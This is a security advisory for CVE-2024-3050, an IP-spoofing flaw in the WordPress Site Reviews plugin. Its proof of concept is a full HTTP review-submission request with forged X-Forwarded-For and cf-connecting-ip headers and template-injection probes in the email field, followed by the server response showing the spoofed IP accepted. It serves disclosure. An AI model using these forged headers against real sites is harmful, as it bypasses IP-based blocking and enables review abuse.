Site Reviews < 7.0.0 – IP Spoofing | CVE 2024-3050

Description

The plugin retrieves client IP addresses from potentially untrusted headers, allowing an attacker to manipulate its value. This may be used to bypass IP-based blocking

Proof of Concept

Request sent to the server to add review:

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: localhost:8888
Content-Length: 2196
sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1Y1QjmoN1k9aBC7F
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Accept: */*
Origin: http://localhost:8888
Referer: http://localhost:8888/wordpress/?page_id=594
Connection: close
X-Forwarded-For: 99.99.99.99
cf-connecting-ip: 99.99.99.99

------WebKitFormBoundary1Y1QjmoN1k9aBC7F
Content-Disposition: form-data; name="site-reviews[_action]"

submit-review
------WebKitFormBoundary1Y1QjmoN1k9aBC7F
Content-Disposition: form-data; name="site-reviews[_nonce]"

d94cadf7b1
------WebKitFormBoundary1Y1QjmoN1k9aBC7F
Content-Disposition: form-data; name="site-reviews[_post_id]"

594
------WebKitFormBoundary1Y1QjmoN1k9aBC7F
Content-Disposition: form-data; name="site-reviews[_referer]"


------WebKitFormBoundary1Y1QjmoN1k9aBC7F
Content-Disposition: form-data; name="site-reviews[assigned_posts]"


------WebKitFormBoundary1Y1QjmoN1k9aBC7F
Content-Disposition: form-data; name="site-reviews[assigned_terms]"


------WebKitFormBoundary1Y1QjmoN1k9aBC7F
Content-Disposition: form-data; name="site-reviews[assigned_users]"


------WebKitFormBoundary1Y1QjmoN1k9aBC7F
Content-Disposition: form-data; name="site-reviews[excluded]"


------WebKitFormBoundary1Y1QjmoN1k9aBC7F
Content-Disposition: form-data; name="site-reviews[form_id]"

glsr_2160fffb
------WebKitFormBoundary1Y1QjmoN1k9aBC7F
Content-Disposition: form-data; name="site-reviews[terms_exist]"

1
------WebKitFormBoundary1Y1QjmoN1k9aBC7F
Content-Disposition: form-data; name="site-reviews[4e174f9d]"


------WebKitFormBoundary1Y1QjmoN1k9aBC7F
Content-Disposition: form-data; name="site-reviews[rating]"

5
------WebKitFormBoundary1Y1QjmoN1k9aBC7F
Content-Disposition: form-data; name="site-reviews[title]"

test
------WebKitFormBoundary1Y1QjmoN1k9aBC7F
Content-Disposition: form-data; name="site-reviews[content]"

test
------WebKitFormBoundary1Y1QjmoN1k9aBC7F
Content-Disposition: form-data; name="site-reviews[name]"

test
------WebKitFormBoundary1Y1QjmoN1k9aBC7F
Content-Disposition: form-data; name="site-reviews[email]"

szakrzewski+${5*5}${{6*6}}@afine.com
------WebKitFormBoundary1Y1QjmoN1k9aBC7F
Content-Disposition: form-data; name="site-reviews[terms]"

1
------WebKitFormBoundary1Y1QjmoN1k9aBC7F
Content-Disposition: form-data; name="action"

glsr_action
------WebKitFormBoundary1Y1QjmoN1k9aBC7F
Content-Disposition: form-data; name="_ajax_request"

true
------WebKitFormBoundary1Y1QjmoN1k9aBC7F--

Response:

HTTP/1.1 200 OK
Server: nginx/1.19.2
Date: Thu, 22 Feb 2024 14:03:45 GMT
Content-Type: application/json; charset=UTF-8
Connection: close
X-Powered-By: PHP/7.4.33
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Referrer-Policy: strict-origin-when-cross-origin
X-Frame-Options: SAMEORIGIN
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Content-Length: 1706

{"success":true,"data":{"errors":false,"html":"<div class=\"glsr-review\" data-type=\"local\" id=\"review-596\" data-assigned='[]'>\n    <div class=\"glsr-review-title\"><h4 class=\"glsr-tag-value\">test<\/h4><\/div>\n    <div class=\"glsr-review-rating\"><div class=\"glsr-star-rating glsr-stars\" data-rating=\"5,0\" data-reviews=\"0\">\n    <span class=\"screen-reader-text\">Rated 5,0 out of 5<\/span>\n    <span class=\"glsr-star glsr-star-full\" aria-hidden=\"true\"><\/span><span class=\"glsr-star glsr-star-full\" aria-hidden=\"true\"><\/span><span class=\"glsr-star glsr-star-full\" aria-hidden=\"true\"><\/span><span class=\"glsr-star glsr-star-full\" aria-hidden=\"true\"><\/span><span class=\"glsr-star glsr-star-full\" aria-hidden=\"true\"><\/span>\n<\/div><\/div> <div class=\"glsr-review-date\"><span class=\"glsr-tag-value\">2024-02-22<\/span><\/div>\n    \n    <div class=\"glsr-review-content\"><div class=\"glsr-tag-value\" data-expanded='false'><p>test<\/p><\/div><\/div>\n     <div class=\"glsr-review-author\"><span class=\"glsr-tag-value\">test<\/span><\/div> \n    \n<\/div>","message":"Your review has been submitted!","redirect":"","review":{"assigned_posts":[],"assigned_terms":[],"assigned_users":[],"author":"test","author_id":0,"avatar":"https:\/\/secure.gravatar.com\/avatar?d=mm&s=80","content":"test","custom":[],"date":"2024-02-22 15:03:45","date_gmt":"2024-02-22 14:03:45","email":"szakrzewski+${5*5}${{6*6}}@afine.com","ID":596,"ip_address":"99.99.99.99","is_approved":true,"is_modified":false,"is_pinned":false,"is_verified":false,"rating":5,"rating_id":19,"response":null,"score":0,"status":"publish","terms":true,"title":"test","type":"local","url":""},"reviews":""}}